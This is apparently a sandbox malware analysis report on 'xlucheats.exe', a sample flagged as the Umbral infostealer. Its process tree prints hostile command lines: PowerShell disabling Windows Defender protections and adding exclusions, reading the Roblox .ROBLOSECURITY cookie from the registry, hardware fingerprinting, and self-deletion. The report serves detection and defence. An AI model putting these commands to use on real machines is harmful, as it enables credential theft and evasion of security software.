Analysis
-
max time kernel
14s -
max time network
15s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
02-06-2024 17:31
Behavioral task
behavioral1
Sample
xlucheats.exe
Resource
win7-20240221-en
General
-
Target
xlucheats.exe
-
Size
231KB
-
MD5
118714b4be372564292805a6016487cf
-
SHA1
08e8bf51aa6f2815d8ef050c21912a079d62aaf7
-
SHA256
b9bc80f978004667f7061aca80b41361b8ed3bfc49a1c00845d8d89688625b53
-
SHA512
523436e0a966027c1e87f9036025f956b96a9e9ded6cdc1f9da9df77384b2c176e758f219834268e9d37f5a236eef551a2561889fc2db429f6e2e49124ade34e
-
SSDEEP
6144:xloZM+rIkd8g+EtXHkv/iD4GAOk8il92vDe8NhoFynb8e1mmFMi:DoZtL+EP8GAOk8il92vDe8NhoFInH
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3256-0-0x0000020672060000-0x00000206720A0000-memory.dmp family_umbral -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Drops file in Drivers directory 1 IoCs
Processes:
xlucheats.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts xlucheats.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 6 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
xlucheats.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3256 xlucheats.exe 4764 powershell.exe 4764 powershell.exe 3896 powershell.exe 3896 powershell.exe 4116 powershell.exe 4116 powershell.exe 4880 powershell.exe 4880 powershell.exe 3992 powershell.exe 3992 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
xlucheats.exewmic.exepowershell.exepowershell.exepowershell.exepowershell.exewmic.exedescription pid process Token: SeDebugPrivilege 3256 xlucheats.exe Token: SeIncreaseQuotaPrivilege 4036 wmic.exe Token: SeSecurityPrivilege 4036 wmic.exe Token: SeTakeOwnershipPrivilege 4036 wmic.exe Token: SeLoadDriverPrivilege 4036 wmic.exe Token: SeSystemProfilePrivilege 4036 wmic.exe Token: SeSystemtimePrivilege 4036 wmic.exe Token: SeProfSingleProcessPrivilege 4036 wmic.exe Token: SeIncBasePriorityPrivilege 4036 wmic.exe Token: SeCreatePagefilePrivilege 4036 wmic.exe Token: SeBackupPrivilege 4036 wmic.exe Token: SeRestorePrivilege 4036 wmic.exe Token: SeShutdownPrivilege 4036 wmic.exe Token: SeDebugPrivilege 4036 wmic.exe Token: SeSystemEnvironmentPrivilege 4036 wmic.exe Token: SeRemoteShutdownPrivilege 4036 wmic.exe Token: SeUndockPrivilege 4036 wmic.exe Token: SeManageVolumePrivilege 4036 wmic.exe Token: 33 4036 wmic.exe Token: 34 4036 wmic.exe Token: 35 4036 wmic.exe Token: 36 4036 wmic.exe Token: SeIncreaseQuotaPrivilege 4036 wmic.exe Token: SeSecurityPrivilege 4036 wmic.exe Token: SeTakeOwnershipPrivilege 4036 wmic.exe Token: SeLoadDriverPrivilege 4036 wmic.exe Token: SeSystemProfilePrivilege 4036 wmic.exe Token: SeSystemtimePrivilege 4036 wmic.exe Token: SeProfSingleProcessPrivilege 4036 wmic.exe Token: SeIncBasePriorityPrivilege 4036 wmic.exe Token: SeCreatePagefilePrivilege 4036 wmic.exe Token: SeBackupPrivilege 4036 wmic.exe Token: SeRestorePrivilege 4036 wmic.exe Token: SeShutdownPrivilege 4036 wmic.exe Token: SeDebugPrivilege 4036 wmic.exe Token: SeSystemEnvironmentPrivilege 4036 wmic.exe Token: SeRemoteShutdownPrivilege 4036 wmic.exe Token: SeUndockPrivilege 4036 wmic.exe Token: SeManageVolumePrivilege 4036 wmic.exe Token: 33 4036 wmic.exe Token: 34 4036 wmic.exe Token: 35 4036 wmic.exe Token: 36 4036 wmic.exe Token: SeDebugPrivilege 4764 powershell.exe Token: SeDebugPrivilege 3896 powershell.exe Token: SeDebugPrivilege 4116 powershell.exe Token: SeDebugPrivilege 4880 powershell.exe Token: SeIncreaseQuotaPrivilege 1580 wmic.exe Token: SeSecurityPrivilege 1580 wmic.exe Token: SeTakeOwnershipPrivilege 1580 wmic.exe Token: SeLoadDriverPrivilege 1580 wmic.exe Token: SeSystemProfilePrivilege 1580 wmic.exe Token: SeSystemtimePrivilege 1580 wmic.exe Token: SeProfSingleProcessPrivilege 1580 wmic.exe Token: SeIncBasePriorityPrivilege 1580 wmic.exe Token: SeCreatePagefilePrivilege 1580 wmic.exe Token: SeBackupPrivilege 1580 wmic.exe Token: SeRestorePrivilege 1580 wmic.exe Token: SeShutdownPrivilege 1580 wmic.exe Token: SeDebugPrivilege 1580 wmic.exe Token: SeSystemEnvironmentPrivilege 1580 wmic.exe Token: SeRemoteShutdownPrivilege 1580 wmic.exe Token: SeUndockPrivilege 1580 wmic.exe Token: SeManageVolumePrivilege 1580 wmic.exe -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
xlucheats.exedescription pid process target process PID 3256 wrote to memory of 4036 3256 xlucheats.exe wmic.exe PID 3256 wrote to memory of 4036 3256 xlucheats.exe wmic.exe PID 3256 wrote to memory of 2668 3256 xlucheats.exe attrib.exe PID 3256 wrote to memory of 2668 3256 xlucheats.exe attrib.exe PID 3256 wrote to memory of 4764 3256 xlucheats.exe powershell.exe PID 3256 wrote to memory of 4764 3256 xlucheats.exe powershell.exe PID 3256 wrote to memory of 3896 3256 xlucheats.exe powershell.exe PID 3256 wrote to memory of 3896 3256 xlucheats.exe powershell.exe PID 3256 wrote to memory of 4116 3256 xlucheats.exe powershell.exe PID 3256 wrote to memory of 4116 3256 xlucheats.exe powershell.exe PID 3256 wrote to memory of 4880 3256 xlucheats.exe powershell.exe PID 3256 wrote to memory of 4880 3256 xlucheats.exe powershell.exe PID 3256 wrote to memory of 1580 3256 xlucheats.exe wmic.exe PID 3256 wrote to memory of 1580 3256 xlucheats.exe wmic.exe PID 3256 wrote to memory of 940 3256 xlucheats.exe wmic.exe PID 3256 wrote to memory of 940 3256 xlucheats.exe wmic.exe PID 3256 wrote to memory of 3228 3256 xlucheats.exe wmic.exe PID 3256 wrote to memory of 3228 3256 xlucheats.exe wmic.exe PID 3256 wrote to memory of 3992 3256 xlucheats.exe powershell.exe PID 3256 wrote to memory of 3992 3256 xlucheats.exe powershell.exe PID 3256 wrote to memory of 2192 3256 xlucheats.exe wmic.exe PID 3256 wrote to memory of 2192 3256 xlucheats.exe wmic.exe PID 3256 wrote to memory of 4104 3256 xlucheats.exe cmd.exe PID 3256 wrote to memory of 4104 3256 xlucheats.exe cmd.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\xlucheats.exe"C:\Users\Admin\AppData\Local\Temp\xlucheats.exe"1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3256 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4036
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\xlucheats.exe"2⤵
- Views/modifies file attributes
PID:2668
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\xlucheats.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4764
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3896
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4880
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1580
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵PID:940
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:3228
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3992
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:2192
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\xlucheats.exe" && pause2⤵PID:4104
-
C:\Windows\system32\PING.EXEping localhost3⤵
- Runs ping.exe
PID:4440
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5a43e653ffb5ab07940f4bdd9cc8fade4
SHA1af43d04e3427f111b22dc891c5c7ee8a10ac4123
SHA256c4c53abb13e99475aebfbe9fec7a8fead81c14c80d9dcc2b81375304f3a683fe
SHA51262a97e95e1f19a8d4302847110dae44f469877eed6aa8ea22345c6eb25ee220e7d310fa0b7ec5df42356815421c0af7c46a0f1fee8933cc446641800eda6cd1b
-
Filesize
944B
MD576692775e4781f0c9f0092f5804cfdb1
SHA16740e4e4110028c62282ee1e7eb8be576a2bc23a
SHA2560c451ff3823450d544066237cbfb08556b7ca36c4a0ea085055f69ab35795b00
SHA5126e0731e3736594d9e86da2fc33e08a663f29100074cc8d46e2716123c946b9eb150c804c7cf8428cac631e1cff984663d41ce3b5e1e77965bd8e2ecf0742af34
-
Filesize
948B
MD51a58f982c18490e622e00d4eb75ace5a
SHA160c30527b74659ecf09089a5a7c02a1df9a71b65
SHA2564b7f800c0dea209162cc86627983993127eb20e3f8616646c41cb3ce15d9b39d
SHA512ddab516a967783c5951717853aa5b3ef6dd5b442db50092888b2e7f3179fc68120fcde69a08d6ab280740eaadb6eadfc758c3118b52706f869e48ac1aebda480
-
Filesize
1KB
MD5276798eeb29a49dc6e199768bc9c2e71
SHA15fdc8ccb897ac2df7476fbb07517aca5b7a6205b
SHA256cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc
SHA5120d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2
-
Filesize
1KB
MD5eeb6ad386d143f278077171fc01a81e8
SHA143cff1bd7240965bfb2f10e47c0cec0f94332e2d
SHA25659d62f9472b4c00b7cae0ee702789fa2b0042c468e4de9421d2430f9973eb00d
SHA512b40f003e6d97adaaf05809f06d12df01984943d9eb6c44eaeffef90df8de0040373150c9714b11a42db5189b7064eeed0609a39f6f1feb91b05dd1835333e8f2
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82